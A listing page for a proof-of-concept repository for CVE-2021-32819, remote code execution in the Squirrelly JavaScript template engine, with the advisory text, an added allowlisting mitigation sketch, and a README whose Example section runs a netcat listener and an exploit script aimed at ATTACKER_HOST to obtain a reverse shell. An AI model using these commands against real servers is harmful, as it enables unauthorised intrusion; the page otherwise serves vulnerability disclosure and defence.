CVE-2021-32819 PoC — Remote code execution in squirrelly

Associated Vulnerability
Title: Remote code execution in squirrelly (CVE-2021-32819)
Description: Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. This issue is fixed in version 9.0.0. For complete details refer to the referenced GHSL-2021-023.
Description
SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.
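
A mitigation sketch for the issue described above, added here and not taken from Squirrelly, the advisory, or the PoC repository: instead of handing request data straight to the render call, copy only declared, type-checked fields onto a fresh object. The view name, field names, limits, and the `engineOption` key are assumptions made up for the example.

```javascript
// Added example: allowlist the template data passed to an Express-style
// render call so request keys can never land next to engine options.

// Per-view schema: the only keys a template may receive, each with a validator.
// View name, field names and limits are assumptions for this sketch.
const VIEW_SCHEMAS = {
  profile: {
    name: (v) => typeof v === 'string' && v.length <= 64,
    page: (v) => typeof v === 'string' && /^[0-9]{1,4}$/.test(v),
  },
};

// Returns { locals, rejected }: locals holds only schema-approved values on a
// null-prototype object; rejected lists every key that was dropped.
function buildRenderLocals(view, untrusted) {
  const schema = VIEW_SCHEMAS[view];
  if (!schema) throw new Error(`no schema registered for view "${view}"`);
  const locals = Object.create(null);
  const rejected = [];
  for (const key of Object.keys(untrusted || {})) {
    const known = Object.prototype.hasOwnProperty.call(schema, key);
    if (known && schema[key](untrusted[key])) {
      locals[key] = untrusted[key];
    } else {
      rejected.push(key); // undeclared key or wrong type: worth logging
    }
  }
  return { locals, rejected };
}

// Constructed request data: one valid field, one nested object where a string
// is expected, and one key the view never declared ("engineOption" is a
// placeholder name, not a real Squirrelly setting).
const sampleQuery = {
  name: 'alice',
  page: { toString: 'x' },
  engineOption: 'value-the-template-never-asked-for',
};

function demo() {
  const { locals, rejected } = buildRenderLocals('profile', sampleQuery);
  // In an Express handler the next step would be res.render('profile', locals).
  return { keys: Object.keys(locals), rejected };
}

console.log(demo());
```

Upgrading to 9.0.0, the version the description lists as fixed, remains the primary remediation; the allowlist limits what reaches the engine regardless of version.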
Readme
# CVE-2021-32819
CVE-2021-32819: SquirrellyJS mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options, remote code execution may be triggered in downstream applications.

### Source
https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/
### Analysis
https://blog.diefunction.io/vulnerabilities/ghsl-2021-023
### squirrelly
v8.0.0 through v8.0.8: Remote Code Execution
### Environment
Ubuntu 20.04.1

### Example
```
nc -lvp 443

python3 exploit.py http://example.com/  ATTACKER_HOST 443
```

![Proof of concept](https://raw.githubusercontent.com/Abady0x/CVE-2021-32819/main/img/POC.png)
File Snapshot

```
[4.0K] /data/pocs/c59b8ca8881bae6749d4969678ca2dde870c76ef
├── [ 809] exploit.py
├── [4.0K] img
│   └── [ 58K] POC.png
└── [ 676] README.md

1 directory, 3 files
```